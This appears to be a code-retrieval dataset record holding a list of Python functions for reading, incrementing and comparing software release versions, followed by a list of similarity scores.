[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def get_current_release():\n return _CURRENT_RELEASE", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_latest_release_version():\n repo = GITHUB.get_user(GITHUB_OWNER).get_repo(GITHUB_REPO)\n latest_release_version = repo.get_latest_release().tag_name\n return latest_release_version", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def select_release():\n release_version = unitdata.kv().get(OPENSTACK_RELEASE_KEY, None)\n if release_version is None:\n release_version = os_utils.os_release('keystone')\n unitdata.kv().set(OPENSTACK_RELEASE_KEY, release_version)\n return release_version", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_latest_version(self):\n latest_release = self._http_client.get(self._github_repo + '/releases/latest')\n if not 'tag_name' in latest_release.json():\n return None\n version = latest_release.json()['tag_name']\n latest_release.close()\n return version", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version 
= Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_version():\n click.echo(get_current_version_number())", "def is_release():\n return VERSION[-1]", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def update_pkg_version(self, production: bool) -> str:\n return (\n self.get_prerelease_package_version(production) if self.mpy_version == \"latest\" else self.get_next_package_version(production)\n )", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def 
get_latest_release(account = None):\n names = get_db_name(account=account, db_type=\"compara\")\n compara = []\n for name in names:\n compara += [int(name.Release)]\n return str(max(compara))", "def get_release_version(self):\n return self.get_property(ADB.VERSION_RELEASE_PROPERTY)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def test_release_update_available_MAJOR(self):\n NEXT = '%d.%d-%d' % (MAJOR + 1, 0, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR + 1, 0, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_release_update_available_MINOR(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def get_distrib_version():\n distrib, version, codename = _get_release_infos() \n return version", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def latest_version(self):\n from leonardo_system.pip import check_versions\n return check_versions(True).get(self.name, None).get('new', None)", "def get_version(self):\r\n\r\n return self.versions[0].number", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def next_release_date(date):\n df = get_release_dates()\n df = df[df['ReleaseDate'] > date]\n return df['ReleaseDate'].iloc[0]", "def get_version():\n return '%d.%d.%d' % version_info", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def update_version() -> str:\n cur_version = get_current_version(args.stage)\n\n if args.stage == \"prod\":\n prv_version = get_current_version(stage='staging')\n new_version = semver.finalize_version(prv_version)\n elif args.stage == \"staging\":\n prv_version = get_current_version(stage='integration')\n assert '-integration' in prv_version\n new_version = prv_version.replace('-integration', '-rc') # don't bump the version number\n else:\n new_version = getattr(semver, f'bump_{args.release}')(str(cur_version))\n new_version = new_version if semver.parse_version_info(new_version).prerelease \\\n else semver.bump_prerelease(new_version, 
token='integration')\n\n if cur_version == new_version:\n print(\"Nothing to promote\")\n exit(0)\n else:\n print(f\"Upgrading: {cur_version} -> {new_version}\")\n return new_version", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def latest(cls):\n releases = cls.query.all()\n if len(releases) == 0:\n return None\n\n releases.sort(key=lambda x: x.version)\n return releases[-1]", "def read_release_version():\n with open(\"RELEASE-VERSION\", \"r\") as f:\n return f.readline().strip()", "def version_max():\n return VERSION_MAX", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def current_version(self):\n try:\n return self.versions.latest()\n except DocumentVersion.DoesNotExist:\n return None", "def get_version():\n return 1", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def get_github_library_version(name, url):\n while True:\n # For the release, make sure the default versions do not include \"-dev\"\n version = raw_input(\"Version of %s?: \" % name)\n if not url_exists(\"%s/releases/tag/%s\" % (url, version)):\n print_warning(\"The version of %s is not valid. 
Ensure you've chosen a correct value by checking the \"\n \"GitHub releases for exact naming at \"\n \"%s/releases before you continue.\" % (name, url))\n return version", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_previous_release_info(\n previous_release_version: str | None, past_releases: list[ReleaseInfo], current_release_version: str\n) -> str | None:\n previous_release = None\n if previous_release_version == current_release_version:\n # Re-running for current release - use previous release as base for git log\n if len(past_releases) > 1:\n previous_release = past_releases[1].last_commit_hash\n else:\n previous_release = past_releases[0].last_commit_hash if past_releases else None\n return previous_release", "def release(self) -> pulumi.Output['outputs.ReleaseResponse']:\n return pulumi.get(self, \"release\")", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def get_last_release_id():\n url = \"https://api.github.com/repos/yt-dlp/yt-dlp/releases/latest\"\n try:\n with urlopen(url, timeout=10) as resp:\n return json.loads(resp.read().decode(\"utf-8\")).get(\"tag_name\", \"0\")\n except URLError as e:\n log(f\"YouTubeDLHelper error [get last release id]: {e}\")", "async def fetch_data(self) -> GitHubReleaseModel | None:\n result = await self._client.repos.releases.list(\n self.repository, **{\"params\": {\"per_page\": 1}}\n )\n if not result.data:\n return None\n\n for release in result.data:\n if not release.prerelease:\n return release\n\n # Fall back to the latest release if no non-prerelease release is found\n return result.data[0]", "def get_version(self, name: str, version=None) -> int:\n division, is_vertebrate = self.get_division(name)\n if version is None:\n latest_version = self.get_release(is_vertebrate)\n return latest_version\n\n if not str(version).isdecimal():\n raise TypeError(\"Version must be a number\")\n version = int(version)\n\n all_versions = self.get_releases(is_vertebrate)\n ensembl = f\"Ensembl{'' if is_vertebrate else 'Genomes'}\"\n if version not in all_versions:\n raise ValueError(\n f\"{ensembl} release version {version} \"\n f\"not found. Available versions: {all_versions}\"\n )\n\n releases = self.releases_with_assembly(name)\n if version not in releases:\n raise FileNotFoundError(\n f\"{name} not found on {ensembl} release {version}. 
\"\n f\"Available on release versions: {releases}\"\n )\n return version", "def get_version():\r\n return __version__", "def next_available_number(cls):\n try:\n return cls.objects.latest().number + 1\n except cls.DoesNotExist:\n return 1", "async def get_latest_version(self, pkg: str) -> Optional[str]:\n return None", "def get_recent_release_from_product_details() -> int:\n rls_prod_details_json = get(\n \"https://product-details.mozilla.org/1.0/firefox_history_major_releases.json\"\n ).json()\n rls_prod_details = Series(rls_prod_details_json).sort_values(ascending=True)\n [(cur_rls_vers, _date)] = rls_prod_details[-1:].iteritems()\n cur_rls_maj, *_v = cur_rls_vers.split(\".\")\n return int(cur_rls_maj)", "def latest_version(self):\n state = self.coordinator.data\n\n try:\n # fake a new update\n # return \"foobar\"\n return dict_get(state, \"firmware_update_info.base.version\")\n except KeyError:\n return None", "def getCurrentVersion():\n f_version = configManagement.currentVersion()\n return f_version", "def test_release_update_available_CURRENT(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR + 1, 0)\n self._ucr({\n 'repository/online/component/a': 'yes',\n 'repository/online/component/a/version': 'current',\n })\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR + 1, NEXT): DATA,\n })\n self.assertRaises(U.RequiredComponentError, self.u.release_update_available, errorsto='exception')", "def get_version(self):\n\t\treturn call_sdk_function('PrlApi_GetVersion')", "def get_increased_version():\n logs = get_rolling_log_history()\n\n if has_breaking_changes(logs):\n return get_increased_base_version(0)\n if has_features(logs):\n return get_increased_base_version(1)\n if has_fixes(logs):\n return get_increased_base_version(2)", "def get_new_build(old_version, new_version, build):\n\n # Version did not change, increment the current build number\n if old_version == new_version:\n return str(int(build) + 1)\n\n # Version changed, start over at 1\n else:\n return str(1)", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_latest_version(self):\n try:\n version = self.sourcestudyversion_set.filter(\n i_is_deprecated=False\n ).order_by( # We can't use \"latest\" since it only accepts one field in Django 1.11.\n '-i_version',\n '-i_date_added'\n ).first()\n except ObjectDoesNotExist:\n return None\n return version", "def available_version(self) -> Sequence['outputs.VersionResponse']:\n return pulumi.get(self, \"available_version\")", "def next_version(file_):\n split_file = file_.rsplit(\"_\", 1)\n name_file = split_file[0]\n version = split_file[-1]\n padding = len(version)\n\n if version.isdigit():\n next_version = int(version) + 1\n next_version = str(next_version).zfill(padding)\n\n return concat(name_file, next_version, separator=\"_\")\n else:\n e = concat(file_, \" is incorrect.\")\n raise ValueError(e)", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def 
test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_max_build_version(version: str) -> str:\n return Version(version).bump_minor().get_stable().dumps()", "def switch_to_latest_version(self):\n self.current_version = Version.objects.filter(is_published=True).latest()\n self.save()", "def latest_version(self) -> AwesomeVersion | None:\n return self.sys_updater.version_cli", "def test_release_update_available_PATCH(self):\n NEXT = '%d.%d-%d' % (MAJOR, MINOR, PATCH + 1)\n self._uri({\n '%d.%d/maintained/%s/all/Packages.gz' % (MAJOR, MINOR, NEXT): DATA,\n })\n next = self.u.release_update_available()\n self.assertEqual(NEXT, next)", "def get_version(self):\n return self.__make_api_call('get/version')", "def get_version(self):\n return self.api_version", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_version(self) -> str:\n return versioning.get_version()", "def GetApiVersion(cls):\n if cls.ReleaseTrack() == base.ReleaseTrack.ALPHA:\n return 'alpha'\n elif cls.ReleaseTrack() == base.ReleaseTrack.BETA:\n return 'beta'\n return 'v1'", "def get_version(self):\n\n r = self._create_operation_request(self, method=\"GET\")\n root_info = send_session_request(self._session, r).json()\n return root_info[\"currentVersion\"]", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def get_version(self):\n return self.version", "def get_version_by_number(version_manager, version_number, request):\n return version_manager.versions[version_number - 1]", "def get_version(self):\n res = requests.get(self.base_url + '/version')\n\n return res", "def get_release(\n self,\n ) -> Callable[[cloud_deploy.GetReleaseRequest], cloud_deploy.Release]:\n # Generate a \"stub function\" on-the-fly which will actually make\n # the request.\n # gRPC handles serialization and deserialization, so we just need\n # to pass in the functions for each.\n if \"get_release\" not in self._stubs:\n self._stubs[\"get_release\"] = self.grpc_channel.unary_unary(\n \"/google.cloud.deploy.v1.CloudDeploy/GetRelease\",\n request_serializer=cloud_deploy.GetReleaseRequest.serialize,\n response_deserializer=cloud_deploy.Release.deserialize,\n )\n return self._stubs[\"get_release\"]", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version():\n return about.get_version()", "def get_version(self):\n return self.cur_config['version']['name']" ]
[ "0.8136026", "0.8127919", "0.7517721", "0.71033996", "0.6974199", "0.6932763", "0.6864649", "0.6853223", "0.6828289", "0.6774772", "0.67444694", "0.6615308", "0.6605916", "0.6588041", "0.65674776", "0.65634", "0.65570605", "0.6548462", "0.6492869", "0.64794105", "0.6404592", "0.6335719", "0.63208365", "0.631665", "0.6316141", "0.62935823", "0.62629706", "0.62320495", "0.6178687", "0.6120628", "0.6096705", "0.60799634", "0.60785675", "0.60503054", "0.60444444", "0.60434645", "0.60283756", "0.6023517", "0.60063714", "0.60038364", "0.597773", "0.59659004", "0.59657574", "0.59581727", "0.59360135", "0.5934122", "0.5929531", "0.5926995", "0.591262", "0.5900893", "0.5895264", "0.5889708", "0.58864063", "0.588424", "0.588418", "0.5877367", "0.58642745", "0.5838755", "0.58357346", "0.5832884", "0.5818726", "0.5798821", "0.5794198", "0.57795024", "0.5769929", "0.57604957", "0.5755541", "0.5754152", "0.5747085", "0.5745661", "0.57389385", "0.57363695", "0.57363695", "0.57363695", "0.5735756", "0.5731898", "0.5729765", "0.57276005", "0.5725639", "0.5723025", "0.5721192", "0.5716473", "0.5714247", "0.5713745", "0.5706942", "0.570206", "0.5692164", "0.56874573", "0.56873256", "0.5682467", "0.5682467", "0.5682467", "0.5682467", "0.5682467", "0.56814724", "0.56744254", "0.56706244", "0.5665648", "0.56628984", "0.5658192", "0.5657588" ]
0.0
-1
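
Note on the record above: its document is a bump_release method that dispatches on a release-type constant to the matching bump method. Below is a minimal, self-contained Python sketch of that dispatch pattern, runnable on its own — the Version dataclass, the VersionParts constants, and the example values are illustrative assumptions for this sketch, not fields of the dataset.

from dataclasses import dataclass
from typing import Literal


class VersionParts:
    # String constants standing in for the VersionParts enum used in the record.
    MAJOR = "major"
    MINOR = "minor"
    MICRO = "micro"


@dataclass(frozen=True)
class Version:
    major: int
    minor: int
    micro: int

    def bump_major(self, inc: int = 1) -> "Version":
        # A major bump resets the lower parts, as in semantic versioning.
        return Version(self.major + inc, 0, 0)

    def bump_minor(self, inc: int = 1) -> "Version":
        return Version(self.major, self.minor + inc, 0)

    def bump_micro(self, inc: int = 1) -> "Version":
        return Version(self.major, self.minor, self.micro + inc)

    def bump_release(
        self,
        release_type: Literal["major", "minor", "micro"] = VersionParts.MICRO,
        inc: int = 1,
    ) -> "Version":
        # Same dispatch shape as the dataset document: try major, then minor,
        # and fall through to micro as the default.
        if release_type == VersionParts.MAJOR:
            return self.bump_major(inc)
        if release_type == VersionParts.MINOR:
            return self.bump_minor(inc)
        return self.bump_micro(inc)


print(Version(1, 2, 3).bump_release("minor"))  # Version(major=1, minor=3, micro=0)
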
Get next major version.
def bump_major(self: _R, inc: int = 1) -> _R: if not self.is_stable and self.minor == 0 and self.micro == 0: return self.get_stable().bump_major(inc - 1) return self._replace( BaseVersion( epoch=0, release=(self.major + inc, 0, 0), pre=None, post=None, dev=None, local=None, ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def major_version(self) -> str:\n return pulumi.get(self, \"major_version\")", "def get_major_version(version):\n return str(check_version(version)[0])", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def major_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"major_version\")", "def major_version(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"major_version\")", "def major_version(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"major_version\")", "def _major_version(self):\n version_tuple = StrictVersion(self.plugin.version).version\n major = '.'.join(map(str, version_tuple[:2]))\n\n return major", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def version_min():\n return VERSION_MIN", "def major_version(self):\n return self.unpack_dword(0x14)", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := 
get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_version():\n click.echo(get_current_version_number())", "def get_version():\n return 1", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def version_major(self):\n assert self._version_major != NotImplemented\n return self._version_major", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def minor_version(self) -> str:\n return pulumi.get(self, \"minor_version\")", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def get_major_version(version):\n parsed_version = version.split('.')\n return '.'.join(parsed_version[0:2])", "def _next_version(self, dirpath: str) -> int:\n try:\n version_re = re.compile(r\"version_(\\d+)\")\n\n def is_valid_version(v: str):\n return version_re.search(v) is not None\n\n versions = tuple(filter(is_valid_version, os.listdir(dirpath)))\n if not versions:\n # No versions yet\n return 0\n current_version = natsorted(versions, reverse=True)[0]\n # Get the version number using the version pattern\n current_version = int(version_re.search(current_version).group(1))\n return current_version + 1\n except Exception as e:\n logger.warning(f\"Starting from version 0 because of error: {e}\")\n return 0", "def _getVersionMajor(self):\n return int(self.model.getroot().attrib['versionMajor'])", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_version():\n return '%d.%d.%d' % version_info", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def version_max():\n return VERSION_MAX", "def minimum_engine_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"minimum_engine_version\")", "def get_version():\n return \"0.0.1 (prerelease 